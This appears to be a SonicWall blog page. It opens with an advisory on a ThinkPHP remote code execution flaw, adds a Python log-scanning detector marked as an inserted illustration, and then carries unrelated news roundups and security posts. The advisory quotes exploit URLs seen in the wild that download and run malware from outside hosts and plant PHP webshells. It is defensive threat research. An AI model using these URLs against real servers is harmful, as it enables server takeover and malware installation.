ThinkPHP Remote Code Execution (RCE) bug is actively being exploited

ThinkPHP is a web application development framework based on PHP, distributed under the Apache 2.0 open-source license. It focuses on rapid development of enterprise projects and is very popular in China, where over 40,000 servers run ThinkPHP.

Vulnerability Overview:

ThinkPHP has recently released a security update to fix an unauthenticated, high-risk remote code execution (RCE) vulnerability. The root cause is insufficient validation of the controller name passed in the URL, which makes it possible to obtain a shell on the server when the forced-routing option is not enabled.

ThinkPHP parses the URL query parameters to retrieve the module, the controller and the function. It then checks whether a class exists for the controller name. If so, it instantiates an object of this class and executes the function passed in the URL.

The URL query given below is parsed using the separator character ‘/’. A controller class name should never contain ‘\’. Because of the bug, ‘\think\app’ is accepted as the controller class name and ‘invokefunction’ as the function, so the framework creates an instance of the ‘App’ class in the ‘think’ namespace and calls its method ‘invokefunction’. ‘invokefunction’ takes an arbitrary function as its argument, allowing threat actors to perform remote code execution.


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

The same vulnerability allows remote code execution through another controller class, ‘Request’, in ThinkPHP. The Request class can be instantiated with the URL below, allowing its cache function to execute the arbitrary function supplied as part of the URL query.


?s=index/\think\request/cache&key=1|phpinfo

Both cases stem from the framework’s insufficient validation of the controller name, allowing arbitrary remote code execution or even full access to the server.

ThinkPHP has fixed the vulnerability by adding a regular-expression check on the controller name.


Exploit Campaign:

SonicWall Threat Research Lab has observed various attempts to exploit the recently disclosed ThinkPHP RCE vulnerability. It seems to be adopted by threat actors immediately after public disclosure. This vulnerability is currently being exploited by different threat groups to install botnets and other malicious code on the servers running vulnerable versions of ThinkPHP.

Below are some of the URLs observed attempting to exploit the ThinkPHP RCE vulnerability:

    1. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://cnc.arm7plz.xyz/bins/set.x86 -O /tmp/.eSeAlg; chmod 777 /tmp/.eSeAlg; /tmp/.eSeAlg thinkphp
    2. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'<?php eval($_POST[qazw]);?>' > result.php
    3. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'print("tj"." tj");
    4. index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
    5. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 46.30.43.159:81/zz
    6. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
    7. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 176.32.33.124/zzta
    8. index.php?s=index/\think\app/invokefunction&function=assert&vars[0]=${@print(eval(phpinfo().fputs(fopen('lx.php','w'), Base64_decode('Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4='))))}
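The following script is an added illustration and is not part of the SonicWall write-up or of ThinkPHP's own code. It splits the ?s= route the way the vulnerability overview describes, applies an allowlist check of the kind the regular-expression fix introduces (the expression used here is an assumption, not the vendor's exact pattern), and then runs that same check over constructed access-log lines to flag requests shaped like the ones listed above, so a defender can hunt for exploitation attempts in existing logs. The log lines, IP addresses and function names (split_route, controller_name_is_valid, route_from_target, classify_request, scan_access_log) are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Allowlist for a controller name: a letter, then word characters or dots.
# A backslash (PHP namespace separator) or slash can never pass. This is the
# kind of check the advisory describes; the exact expression ThinkPHP ships
# is not reproduced here (assumption for this example).
CONTROLLER_NAME = re.compile(r'^[A-Za-z](\w|\.)*$')

# Route shape seen in the requests listed above: optional leading backslash,
# the `think` namespace, and one of the two classes the text names.
ABUSED_CONTROLLER = re.compile(r'^\\?think\\(app|request)$', re.IGNORECASE)

# Request target inside a combined-format access-log line.
REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')

# Constructed sample log lines (not real traffic); 203.0.113.0/24 is the
# documentation range. Line 2 and 3 mirror URLs 6 and the Request variant
# from the text, URL-encoded the way they usually reach a server.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Dec/2018:09:12:01 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 1834',
    '203.0.113.7 - - [21/Dec/2018:09:12:44 +0000] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 200 45',
    '203.0.113.9 - - [21/Dec/2018:09:13:02 +0000] "GET /index.php?s=index/think%5Crequest/cache&key=1|phpinfo HTTP/1.1" 200 0',
    '203.0.113.11 - - [21/Dec/2018:09:13:30 +0000] "GET /index.php/index/%5Cthink%5Capp/invokefunction?function=phpinfo HTTP/1.1" 200 0',
    '203.0.113.12 - - [21/Dec/2018:09:14:00 +0000] "GET /static/logo.png HTTP/1.1" 304 0',
]


def split_route(route):
    """Split a `module/controller/action` route on '/' as the text describes;
    missing parts fall back to the framework's usual defaults (assumed here)."""
    parts = [p for p in route.strip('/').split('/') if p]
    module = parts[0] if len(parts) > 0 else 'index'
    controller = parts[1] if len(parts) > 1 else 'Index'
    action = parts[2] if len(parts) > 2 else 'index'
    return module, controller, action


def controller_name_is_valid(name):
    """The check the vulnerable versions lacked: only a plain class name is
    accepted, so a namespaced value such as '\\think\\app' is rejected."""
    return CONTROLLER_NAME.match(name) is not None


def route_from_target(target):
    """Return the route carried by a request target, either from ?s= or from
    the PATH_INFO after index.php, or None if neither is present."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if 's' in query:
        return query['s'][0]          # parse_qs already URL-decodes the value
    path = unquote(parts.path)
    marker = '/index.php/'
    if marker in path:
        return path.split(marker, 1)[1]
    return None


def classify_request(target):
    """Return None for a benign target, otherwise a dict describing why the
    request matches the ThinkPHP controller-injection shape."""
    route = route_from_target(target)
    if route is None:
        return None
    module, controller, action = split_route(route)
    if controller_name_is_valid(controller):
        return None                   # a well-formed controller name: not this bug
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {
        'module': module,
        'controller': controller,
        'action': action,
        'known_abused_class': ABUSED_CONTROLLER.match(controller) is not None,
        # `function` names the PHP callable that invokefunction would run.
        'function': query.get('function', [None])[0],
    }


def scan_access_log(lines):
    """Return [(line_number, finding), ...] for every matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_TARGET.search(line)
        if not match:
            continue
        finding = classify_request(match.group(1))
        if finding is not None:
            hits.append((number, finding))
    return hits


if __name__ == '__main__':
    for number, finding in scan_access_log(SAMPLE_LOG):
        print(number, finding)
```

The scan only looks at GET/POST/HEAD request targets, so a route submitted in a POST body, or a log format that stores the query separately, would need the same classify_request check applied to that field instead; the controller-name check itself is what matters, not the exact list of abused class names, since any backslash in the controller position is already outside what a legitimate route should contain.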

Fix:

Upgrade to ThinkPHP version 5.0.23 or 5.1.31 to resolve the issue.
If you use a content management system that’s based on ThinkPHP 5, it is likely affected by this vulnerability.

Vendor advisory link: https://blog.thinkphp.cn/869075

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13955 ThinkPHP Remote Code Execution
  • IPS: 13965 ThinkPHP Remote Code Execution 2
  • WAF: 1689 ThinkPHP Remote Code Execution

Cyber Security News & Trends – 12-21-18

Quantum Cryptography, Malware spreading through the cloud, and Fortnite making teenagers a lot of money; SonicWall has collected and compiled this week’s best cybersecurity stories, just for you.


SonicWall Spotlight

CEO Outlook: Five Questions on 2019 – CRN.com

  • SonicWall CEO Bill Conner gives his five predictions for 2019; from the biggest market opportunities to his thoughts on why staying up-to-date will be key for Channel Partners. He also predicts that 2019 will be the year of the SonicWall Capture Cloud Platform.

SonicWall Increasing Local Partner Support Across EMEA – Computer Weekly

  • SonicWall celebrates key EMEA milestones including the hiring of industry-leading talent and the opening of three new offices in the UK, Spain, and the UAE.

Quantum Cryptography: The Next-Generation of Secure Data Transmission – Information-Age

  • With SonicWall threat data showing an increase in encrypted threats throughout 2018, Information Age speculates that quantum cryptography could be the future of encryption.

Cyber Security News

Public Clouds: Fertile Ground to Spread Malware – Security Boulevard

  • A general trust in cloud services is leaving an easy entry point open for threat actors to spread malware. Researchers have already found browser hijacker adware Linkury making its way across Microsoft Azure.

Hackers Have Earned $1.7 Million so Far From Trading Data Stolen From US Gov Payment Portals – ZDNet

  • Click2Gov, a US government self-service payment system owned by Superion, was hit by a data breach in September 2017. Security researchers are estimating that the hackers have earned at least $1.7 million to date selling the information on the Dark Web.

Google Finds Internet Explorer Zero-Day Exploited in Targeted Attacks – Security Week

  • Microsoft released a patch for Internet Explorer fixing a dangerous zero-day bug. SonicWall Capture Labs also issued a signature to provide protection.

Fortnite Teen Hackers ‘Earning Thousands of Pounds a Week’ – BBC

  • With Fortnite estimated to have earned more than £1 billion through selling in-game “skins” there is a growing black-market, often run both by and for very young teenagers.

Irish Data Authority Probes Facebook Photo Breach – Security Week

  • A GDPR investigation has been launched in Ireland after it was revealed that up to 6.8 million users may have had their photos exposed to third party apps. A fine of up to four percent of annual global turnover can be issued to a corporation if they are found to be in breach of GDPR.

New Malware Pulls Its Instructions From Code Hidden in Memes Posted to Twitter – Tech Crunch

  • Researchers have found a type of malware that appears to be activated by memes on Twitter. The good news for those who can’t resist a link to a laugh is that it still looks to be in a testing stage and may never be released.

NASA Discloses Data Breach – ZDNet

  • NASA confirmed a data breach in October 2018 in which a third party gained access to personal data, including Social Security Numbers, of current and former employees. No missions are believed to be jeopardized by the hack, but the investigation into the incident will “take time.”

The Nightmare Before Christmas: Cybersecurity Risks for Children’s Toys – EURACTIV (Europe)

  • As the Internet of Things enters toy manufacturing a host of problems are coming with it; open Bluetooth connections, cheap manufacturing standards, and cybersecurity laws that cannot yet be effectively applied.

In Case You Missed It

Evolution Ransomware actively spreading in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Evolution Ransomware [Evolution.RSM] actively spreading in the wild.

Evolution encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Contents of the Evolution ransomware

Infection Cycle:

The Ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ (_H0W_TO_REC0VER_[Random].html
    • %App.path%\ (_H0W_TO_REC0VER_[Random].txt
    • %App.path%\ (_H0W_TO_REC0VER_[Random].lnk
    • %App.path%\ [File Name]. Random
    • %Userprofile\Desktop %\ (_H0W_TO_REC0VER_[Random].html
      • Instruction for recovery

Once the computer is compromised, the Ransomware runs the following commands:

The Ransomware encrypts all the files and appends a random extension such as [.hAOrGb] onto each encrypted file’s filename.

After encrypting all personal documents the Ransomware shows the following webpage containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Evolution.RSM (Trojan)

5 Tips to Keep You Cybersecure During Holiday Travel

The holiday season is one of the busiest times of the year for travel, which means it’s also one of the most vulnerable times of the year for travelers’ belongings, including sensitive personal data.

Those looking forward to spending time away from the office and relaxing with friends and family are likely making plans to secure their belongings at home, but what about securing devices and data?

Year-to-date attack data through November 2018 shows an increase in attacks across nearly all forms of cybercrime, including increases in intrusion attempts, encrypted threats, and malware attacks.

Below are some simple ways to consider protecting your cyber assets and have peace of mind during a well-earned holiday break.

  1. Lock Devices Down
    While traveling, lock all your mobile devices (smartphones, laptops, and tablets) via fingerprint ID, facial recognition, or a PIN number. This will be the first line of defense against a security breach in the event that any of your devices have been momentarily misplaced or forgotten.
  2. Minimize Location Sharing
    We get it! You want to share the fun memories from your trip with your friends and family on social media. However, excessive sharing, especially sharing of location data, creates a security threat at home. If you’re sharing a photo on a boat or at the Eiffel Tower, it’s easy for a criminal to determine you’re not at home or in your hotel room, which leaves the personal property you left behind vulnerable to theft or breach. If you must share location data, wait until after you have returned home to geotag that selfie from your trip.
  3. Bring Your Own Cords and Power Adapters
    Cyber criminals have the ability to install malware in public places such as airport kiosks and USB charging stations. If you are unable to find a secure area to charge your devices or you are unsure of the safety of the charging area, power your device down prior to plugging it in.
  4. Disable Auto-Connect
    Most phones have a setting that allows a device to automatically connect to saved or open Wi-Fi networks. This feature is convenient when used at home, but can leave your device vulnerable to threat actors abusing it for man-in-the-middle attacks. Disable the auto-connect features on your devices and wipe saved network SSIDs from the device prior to your trip to avoid exploitation.
  5. Be Cautious of Public Wi-Fi
    Free Wi-Fi access can often be found at coffee shops and in hotel lobbies as a convenience to travelers, but unencrypted Wi-Fi networks should be avoided. Before you connect to a new Wi-Fi source, ask for information regarding the location’s security protocol, and if you must use a public Wi-Fi connection, be extra cautious. Use a VPN to log in to your work networks and avoid accessing personal accounts or sensitive data while connected to a public Wi-Fi source.

Cybercrime is Trending up During the Holiday Season

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers collected data over the nine-day Thanksgiving holiday shopping window and observed a staggering increase in cyberattacks, including a 432 percent increase in ransomware and a 45 percent increase in phishing attacks.

LIVE WORLDWIDE ATTACK MAP

Visit the SonicWall Security Center to see live data including attack trends, types, and volume across the world. Knowing what attacks are most likely to target your organization can help improve your security posture and provide actionable cyber threat intelligence.

Microsoft IE Zero day CVE-2018-8653

Microsoft released an Out of Band security update today to cover a new zero day (CVE-2018-8653) in Internet Explorer’s scripting engine.

Microsoft describes this vulnerability as a remote code execution vulnerability in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.

If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email.

SonicWall Capture Labs provides protection against this threat via the following signature:

IPS 13959 : Scripting Engine Memory Corruption Vulnerability (DEC 18) 5

ASPY 5345: Malformed-File html.MP.79

4 Security Predictions for MSSPs in 2019

Each year introduces new cyberattack trends that MSSPs must track, analyze and solve for their customers. Many new attack techniques amount to nothing. Others have devastating impact. But it’s important to remain diligent in monitoring the behaviors of cybercriminal organizations.

What security challenges will you face in 2019? Here are four predictions that could affect how you safeguard your customers in the fast-moving cyber threat landscape.

Cryptojacking will impact your resources.

In case you’re not aware, as of late 2017 cryptomining made up half a percent of the world’s energy consumption. In 2019, the main cryptocurrencies will become too expensive to mine legitimately, and cryptomining facilities will either liquidate assets, wait for another price spike or switch to mining a different altcoin. The legitimate mining of coins is too difficult, hence the spike in cryptojacking.

Cryptominers are a type of malware that is discreetly embedded on machines with a single objective: use your processing power to illegally mine for cryptocurrency. It’s not a breach or compliance issue, so it doesn’t always grab the headlines. But cryptojacking will steal resources — from both you and your customers. This form of malware is also very difficult to detect.

The impact to your customers will likely be slower computers and collateral damage that’s a byproduct of the malware itself. To MSSPs, it can be even more damaging. If you have less compute power, you’ll need more boxes to serve your customers … costing you more and more money until the malware is properly mitigated.

The best methods for stopping malware include an overlapping approach of next-generation firewalls, secure email solutions, real-time sandboxing and advanced endpoint security, which help detect and block modern and never-before-seen malware variants, including emerging cryptojacking attacks.

Ransomware will spike again.

While many cybersecurity vendors are still collecting full-year data for 2018, SonicWall’s year-to-date threat intelligence shows a massive ransomware spike in 2018 after a down 2017. And SonicWall’s early prediction is that 2019 will likely witness the same trend. Despite wild downward swings in cryptocurrency prices, the demands remain the same, but language is changed to reflect specific dollar amounts: “Send $750 USD worth of bitcoin.”

Through November 2018, SonicWall recorded a 119 percent year-to-date increase in ransomware attacks. In fact, each SonicWall customer faced an average of 56 ransomware attacks — in November alone. That’s a 149 percent increase over the same month last year.

Ransomware is very visible, very damaging and potentially very expensive — either for ransom payout or post-infection remediation. Simply, ransomware has a scare factor and will be noticed by your customers.

Ransomware is also a mess to clean up for MSSPs and costs you even more in support calls and tickets. The worst part? If a customer becomes a ransomware victim, there’s a high likelihood your reputation is tarnished and your relationship damaged.

Encrypted threats will continue slow rise.

It’s slow and steady, but cyberattacks via encrypted traffic (SSL/TLS) will continue to increase in volume. As long as an attacker applies for a TLS certificate with the same name that matches his/her domain registration, the (often free) certificate is theirs. Any malicious payloads delivered from said domain/website cannot be inspected by traditional means.

For the most part, SSL/TLS traffic remains an unchecked attack vector for cybercriminals to exploit. Until organizations get serious about responsibly decrypting and inspecting SSL/TLS traffic, cybercriminals will leverage it to circumvent strong network security controls.

As an MSSP, it’s smart to advise customers to leverage next-generation firewalls and other security appliances that offer deep packet inspection of SSL/TLS traffic. This will help further reduce the attack surface area of your customers.

Customers will want you to prove your worth.

Cybersecurity is a booming — and expensive — business. So much so, many of your customers are more educated about malware trends, evolving attack strategies and criminal behavior. And thanks to data breaches published daily in the news, it’s now part of the mainstream dialogue, too.

In short, savvy customers have more awareness than ever and want indicators that demonstrate how you’re protecting their business — and how much it costs to get those results.

Many security vendors and MSSPs are already down this path. If you’re one that hasn’t yet added this to your value-add, it’s time to plan and market solutions and services that deliver customized threat intelligence to your customers. New real-time data and analysis make it easier to prove your worth.


This story originally appeared on MSSP Alert and was republished with permission.

Is 802.11ax Going Away? And What is Wi-Fi 6?

The Wi-Fi Alliance has announced a change in the Wi-Fi naming standards. Yep. That’s right. The terms that you are now used to — like 802.11ax, 802.11ac and 802.11n — are being replaced with a much simpler naming scheme: Wi-Fi 6, Wi-Fi 5 and Wi-Fi 4, respectively.

Anything that predates 802.11n isn’t officially getting a name change. This move from the Wi-Fi Alliance is aimed at making it simpler for manufacturers and consumers to understand and use the technologies. Along with the new names, they get new logos as well. However, from a regulatory and specification standpoint, the standards still retain their technical naming scheme: IEEE 802.11.

“For nearly two decades, Wi-Fi users have had to sort through technical naming conventions to determine if their devices support the latest Wi-Fi,” said Edgar Figueroa, president and CEO of Wi-Fi Alliance, in the official announcement. “Wi-Fi Alliance is excited to introduce Wi-Fi 6, and present a new naming scheme to help industry and Wi-Fi users easily understand the Wi-Fi generation supported by their device or connection.”

New Wi-Fi Naming Standards

  • Wi-Fi 6 identifies devices that support 802.11ax technology
  • Wi-Fi 5 identifies devices that support 802.11ac technology
  • Wi-Fi 4 identifies devices that support 802.11n technology

Source: Wi-Fi Alliance

According to a new study by the Wi-Fi Alliance, the global economic value of Wi-Fi will reach $1.96 trillion this year and increase to $3.5 trillion by 2023. To keep up with the proliferation of Wi-Fi devices, it is essential to introduce technologies that keep pace with the changing tides. One of the most talked-about wireless technologies in recent times is the 802.11ax standard, or Wi-Fi 6.

What is Wi-Fi 6?

Wi-Fi 6 is currently deemed the future of Wi-Fi. Why? This is because it introduces significant wireless enhancements over the current Wi-Fi 5 technology.

With the rise in the number of devices and bandwidth-intensive applications, one of the biggest challenges we face on Wi-Fi networks is poor performance. In addition to having high, system-wide throughput, it is also essential to ensure high performance on a per-client basis, specifically for high-density use cases.

This is where Wi-Fi 6 could greatly improve performance, concurrent connections and business productivity. The significant benefits introduced by Wi-Fi 6 include:

  • Orthogonal Frequency Division Multiple Access (OFDMA)
    Wi-Fi 6 introduces OFDMA, which is an enhancement over orthogonal frequency-division multiplexing (OFDM), a technology that is used in Wi-Fi 5 and dates back to the 802.11a era. OFDM allows only one transmission at a time. OFDMA, in comparison, divides a channel into resource units to allow multiple communications simultaneously. With Wi-Fi 6, each resource unit can be as low as 2MHz and as high as 160MHz. This enables multiple data transmissions across multiple devices at the same time, improving overall network efficiency and capacity. Doing so allows frequencies to be divided into smaller subcarriers so that traffic can be coordinated to serve more packets from more devices, increasing the network’s capacity.
  • Upstream and Downstream Multi-User Multiple-In Multiple-Out (MU-MIMO)
    With Wi-Fi 5 Wave 2, MU-MIMO was restricted to only downstream communication, whereas Wi-Fi 6 adds support for MU-MIMO in both upstream and downstream communications. Previously, only the wireless access point (AP) could transmit data to clients simultaneously. Now, clients can transmit data simultaneously back to the AP.
  • 1024 Quadrature Amplitude Modulation (QAM)
    Wi-Fi 5 supports 256 QAM, while Wi-Fi 6 can support 1024 QAM. This denser modulation enables a speed burst of more than 35 percent. This boosts Wi-Fi performance and is most effective for users closer to the access point.
  • Target Wake Time (TWT)
    This mechanism enables AP and client devices to coordinate wake times when devices need to be awake. Doing so improves efficiency, reduces contention and enables power-saving by identifying times when the devices will be awake to send or receive data. This is especially useful in the Internet of Things (IoT) space, leading to significant power-savings for battery-powered devices.
  • Enhancement to 5GHz and 2.4GHz Frequency Bands
    Unlike the Wi-Fi 5 standard that introduced enhancement to only the 5GHz band, Wi-Fi 6 introduces enhancement to both 2.4GHz and 5GHz bands. Data speed of up to 9.6 Gbps is possible with Wi-Fi 6. Enhancements offered by Wi-Fi 6 boost average per-client performance by up to four times in comparison with Wi-Fi 5. In addition, Wi-Fi 6 is backwards-compatible with older technologies like Wi-Fi 5 and Wi-Fi 4.

Solving Challenges with the Wi-Fi 6 Wireless Standard

Wi-Fi 6 is designed for IoT and high-density deployments, including stadiums, universities, shopping malls, transportation hubs, where there are large congregations of people.

At this point in time, Wi-Fi 6 technology is still being amended. The finalized draft is expected in late 2019. Until the standard is finalized, it is not advisable to purchase Wi-Fi 6 products.

In addition, there are no real-world clients to benefit from the Wi-Fi 6 enhancements. Let’s face it, even the latest Apple iPhone XS doesn’t support Wi-Fi 5 Wave 2. The time is right to expand your network on Wi-Fi 5, as it is still gaining traction.

SonicWall offers cutting-edge Wi-Fi 5 Wave 2 access points to address the growing needs of Wi-Fi 5 devices. To learn more about how you can securely expand your network, click here.

Executive Brief: Securing the Next Wave of Wireless

Wireless connectivity is ubiquitous in today’s mobile, global economy. Wireless devices range from smartphones and laptops to security cameras and virtual reality headsets. Businesses need to recognize and address their need for high quality, performance and security across wireless networks and endpoints.

Cyber Security News & Trends – 12-14-18

A history of data breaches, SonicWall expands in Dubai and India, and the reappearance of Shamoon. It’s your cybersecurity news roundup for the week.


SonicWall Spotlight

NetSecOPEN Names Founding Members, Board of Directors – Dark Reading

  • SonicWall is amongst the founding members of NetSecOPEN, an organization that aims to create open network security testing standards. Atul Dhablania’s testimonial confirms SonicWall’s dedication.

The 10 Coolest New Cybersecurity Tools of 2018 – CRN

  • SonicWall Capture Cloud Platform is included on CRN’s coolest tool list for its advanced capabilities at analyzing, classifying and blocking malware.

SonicWall Strengthens Regional Presence With New Dubai HQ – Tahawultech (India)

  • SonicWall executive director Michael Berg is interviewed on video talking about the opening of SonicWall’s new office in Dubai.

India, a Key High Growth Market for SonicWall – CRN India

  • Debasish Mukherjee talks SonicWall’s expansion in India, explaining how it’s strong technology that allows SonicWall to stand out from the crowd.

Cyber Security News

The Wired Guide to Data Breaches – Wired

  • Wired traces the history of electronic data breaches, from a 1984 credit agency leak all the way up to the present day, and looks at the future of the cyber arms race.

Is Tech Too Easy to Use? – The New York Times

  • The increase in frictionless tech experiences means end users often don’t think about how their data is being collected and used. This can have devastating effects down the line if a data breach occurs.

Google to Shut Down Google+ Early Due to Bug That Leaked Data of 52.5 Million Users – NPR

  • After inadvertently giving app developers access to information on over 52 million users in November of this year, Google is shutting down Google+ in April rather than August 2019.

Super Micro Finds No Malicious Hardware in Motherboards  – The Wall Street Journal

  • After headline reports earlier this year claimed that the Chinese government had secretly planted spying chips into computers assembled in China, Super Micro Computers Inc. this week told customers that they can find no evidence of hardware tampering.

Poll: Cyber Crime Has Affected One in Four Americans – The Hill

  • Gallup asked the American public if they or a close family member had been affected by cybercrime and 23 percent say they had.

Fortune 500 Cybersecurity Is Better and Worse Than You’d Think – Axios

  • Rapid7 released their first Industry Cyber-Exposure Report and found huge problems with email security at more than half of Fortune 500 companies. However, it also found that most are doing a good job at reducing entry points.

Over Half of Brazil’s Population Exposed in Security Incident – ZDNet

  • As many as 120 million Brazilian citizens had their ID numbers publicly accessible for weeks in the early months of 2018.

Shamoon Reappears, Poised for a New Wiper Attack – Threat Post

  • Shamoon, a data-wiping malware that can completely cripple an infected PC, previously made world news by targeting energy firms. It first emerged in 2012, made a comeback in 2016 and is now being detected again, leading experts to predict that another attack may be imminent.

In Case You Missed It

November Cyber Threat Data: Watch out for Encrypted Attacks

We’ve reviewed hard numbers from SonicWall Capture Labs to provide you with our analysis of November attack patterns, as well as advice on how to combat the trends we’re seeing in the cybersecurity landscape.

November Attack Data

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through November 2018:

  • 9.8 billion malware attacks (29 percent increase from 2017)
  • 3.5 trillion intrusion attempts (41 percent increase)
  • 309 million ransomware attacks (119 percent increase)
  • 2.6 million encrypted threats (65 percent increase)

In November 2018 alone, the average SonicWall customer faced:

  • 1,545 malware attacks (48 percent decrease from November 2017)
  • 798,350 intrusion attempts (14 percent increase)
  • 56 ransomware attacks (149 percent increase)
  • 145 encrypted threats (2 percent decrease)
  • 20 phishing attacks each day (93 percent increase)

Ebb & Flow of Malware Volume

Despite nearly two years of dominating cyberattack data and headlines, SonicWall’s threat data for November shows that the number of malware attacks worldwide is on an interesting seasonal decline, particularly given the traditional volume around holiday shopping.

Earlier this year, SonicWall was reporting an average of around 1 billion malware attacks a month. As of November 2018, malware volume was 650 million, 48 percent less than the November 2017 high of 1.2 billion. Malware volume for the year, however, is still up 29 percent year to date.

Ransomware Continues to be a Global Concern

This does not mean that cybercriminals are slowing down. Any slack has been picked up with huge increases in web app attacks and ransomware this year. SonicWall previously covered the holiday-specific ransomware jumps, but the year has also seen some major regional spikes, with a 112 percent year to date increase in the U.S. and a staggering 1,671 percent increase in the Asia Pacific region.

In real numbers, this brings these regions almost level for the year with 124 million attacks in the U.S. compared to 121 million in Asia Pacific.

Encrypted Threats a Serious Risk

Encryption is growing at a steady rate: nearly 73 percent of all web traffic monitored by SonicWall is encrypted. Unfortunately, there is a corresponding increase in the number of threats that hide in encrypted traffic. SonicWall data shows a 65 percent increase in encrypted threats compared to 2017.

Encryption protocols, such as Transport Layer Security (TLS), Secure Sockets Layer (SSL) and Secure Shell (SSH), are used to hide cyberattacks. Many malware detection and intrusion prevention solutions are not built to inspect encrypted traffic.

Even entry-level SonicWall firewalls combat encrypted threats with Deep Packet Inspection of SSL/TLS-encrypted traffic and the latest TZ600P and TZ300P range includes PoE integration to cut down on unnecessary wiring.

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about, so they can design and test their security posture and ensure their networks, data, applications and customers are properly protected.

6 Phishing Scams to Look Out for this Holiday Shopping Season

It’s the most wonderful time of year … for cybercriminals. Why? Because it’s the easiest time for them to use phishing attacks to target busy holiday shoppers.

“Cyber Monday sales this year surged to new highs, with a record $7.9 billion spent online that day, an increase of 19.3 percent from a year ago,” according to CNBC, which featured data from Adobe Analytics. “That’s after Black Friday pulled in a record $6.22 billion in e-commerce sales, while sales online Thanksgiving Day totaled $3.7 billion.”

It’s no wonder retailers had another record-breaking year for online sales. Unfortunately, cybercriminals were just as successful. Over the nine-day Thanksgiving holiday shopping window (Nov. 19-27), SonicWall customers faced a 45 percent increase in phishing attacks compared to the average day in 2018. It’s a target-rich environment for cybercriminals to cash in, and the threat doesn’t end after Cyber Monday.

Don’t let phishers steal your holiday spirit. Thankfully, there are proven best practices to improve awareness so employees, consumers and businesses aren’t victimized by malware, ransomware or email threats like phishing attacks.

6 Phishing Attacks, Online Tricks & Holiday Scams to Avoid

Consumers are busy scouring the internet for the best deals whenever they get a few minutes at work, whether in the office or remote. But this presents risk to both employees and businesses. Review these six attacks and scams to be on the lookout for this holiday season.

  • Spoofed Websites: It is estimated that 46,000 new phishing sites are created every day, many of which are propagated through email. According to the Anti-Phishing Working Group (APWG), about 35 percent of phishing attacks were hosted on websites that had HTTPS and SSL certificates, so looking for the lock icon is not enough anymore. Cybercriminals are getting savvier, hijacking the look and feel of popular brands and using spoofed domains with hard-to-catch spelling variations to steal information.
  • Phishing Emails: It’s the holiday season, so employees are in festive moods dreaming about vacation or distracted with online shopping. With the increase in the volume of phishing emails, it is easy to let the guard down and click on well-crafted phishing emails while trying to finish work before the holidays. Businesses should ensure they have a secure email solution implemented to mitigate email-based attacks.
  • Gift Card Scams: Most major retailers offer gift cards that can be purchased electronically. This is truly a gift for cybercriminals to lure victims into clicking on an email offering a free gift card from a major brand or, in the case of a targeted phishing attempt, the gift card may appear to be sent from someone familiar, like a friend or co-worker.
  • Shipping Invoices: This type of phishing email seemingly comes from a popular shipping service, such as FedEx, UPS or the USPS. Cybercriminals use the shopping season opportunistically to send email with phishing links under the guise of tracking a package or downloading a shipping label. Similar shipping phishing emails can appear to come from major retailers like Amazon or Walmart.
  • Illegitimate Apps: Shoppers are taking to mobile apps to shop and the cybercriminals are taking notice. Lookalike apps and rogue apps crowd popular app stores and, once downloaded, prompt for credit card information, social media login credentials or permission to access data on your phone.
  • Letters from Santa: Scammers send bogus emails promising to send your child a letter from Santa for a fee. Beware of clicking on such emails and providing payment information. Many, unfortunately, are scams that prey on unsuspecting parents.

Phishing Awareness for Employees, Businesses

Practicing simple awareness can keep employees and businesses safe from the majority of phishing-based cyberattacks. After all, criminals are counting on users to be too busy to take a few seconds to vet a deal, email or sale. Implement the following tips and best practices to ensure your holiday remains festive.

Tips for employees to enjoy shopping online safely:

  • If the deal is too good to be true, then it probably is … don’t take the bait
  • Stay away from suspicious websites promising coupon codes
  • Hover over and scan URLs before clicking; malicious URLs are usually easy to spot (e.g., unknown domains, long string of numbers, etc.)
